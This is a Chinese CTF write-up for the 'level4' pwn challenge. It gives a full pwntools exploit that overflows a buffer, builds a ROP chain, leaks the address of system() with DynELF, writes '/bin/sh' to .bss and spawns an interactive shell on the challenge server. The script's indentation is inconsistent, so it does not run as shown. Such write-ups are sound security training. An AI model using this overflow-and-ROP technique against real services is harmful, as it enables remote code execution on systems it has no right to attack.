XMAN-level4

XMAN-level4

本题其实就是level3的一个升级版本,唯一的区别就是本题没有提供libc,可以通过DynELF泄漏函数真实地址。有一个地方需要注意,leak函数可以在write之后直接pop三个参数再返回main:

payload+=p32(write_plt)+p32(pppr)+p32(1)+p32(address)+p32(4)+p32(main)

也可以重新返回vuln:

payload+=p32(write_plt)+p32(vlun)+p32(1)+p32(address)+p32(4)

脚本如下:

from pwn import *

#p=process('./level4')
p=remote('pwn2.jarvisoj.com',9880)
level4=ELF('./level4')

#plt
write_plt=0x08048340
read_plt=0x08048310

#addr
main=level4.symbols['main']
basebss=level4.bss()
pppr=0x08048509

def leak(address):
        payload='A'*140
    payload+=p32(write_plt)+p32(pppr)+p32(1)+p32(address)+p32(4)+p32(main)
        p.send(payload)
        data =p.recv(4)
    print "%#x %s" % (address, data)
        return data


d = DynELF(leak, elf=ELF('./level4'))

system_addr = d.lookup('system','libc')
log.success('leak system address: ' + hex(system_addr))

payload2='A'*140+p32(read_plt)+p32(pppr)+p32(0)+p32(basebss)+p32(8)+p32(system_addr)+p32(main)+p32(basebss)
p.send(payload2)
p.send('/bin/sh\x00')
p.interactive()
文章目录
  1. 1. XMAN-level4
|